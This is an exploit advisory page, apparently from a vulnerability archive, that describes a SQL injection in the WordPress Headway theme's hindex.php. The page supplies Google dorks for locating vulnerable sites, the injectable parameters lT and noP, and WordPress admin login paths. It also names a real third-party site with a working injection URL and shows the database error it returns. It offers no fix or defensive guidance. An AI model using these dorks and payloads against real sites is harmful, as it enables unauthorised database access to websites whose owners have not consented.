WordPress Headway Theme The Drag and Drop SQL Injection Vulnerability

2018.05.30
gb KingSkrupellos (GB) gb
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:''/hindex.php?lT=''

####################################################################### Exploit Title : WordPress Headway Theme The Drag and Drop SQL Injection Vulnerability Author [ Discovered By ] : KingSkrupellos Date : 27/05/2018 Vendor Homepage : headwaythemes.com Tested On : Windows Exploit Risk : Medium ####################################################################### Google Dork : inurl:''/hindex.php?lT='' Google Dork 2 : intext:''Powered by Headway, the drag and drop WordPress theme'' Google Dork 3 : intext:''Proudly Powered by Headway and WordPress'' Exploit : /hindex.php?lT=[SQL Injection] /hindex.php?lT=[ID-Number]&noP=[SQL Injection] Admin Panel Login Path => /wordpress/wp-login.php or /wp-login.php ####################################################################### Example Site => cacbasketball.com/hindex.php?lT=1%27 [ Proof of Concept for SQL Injection ] => archive.is/UNxyP Error Performing Query: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') ####################################################################### # Discovered By KingSkrupellos from Cyberizm Digital Security Team #######################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top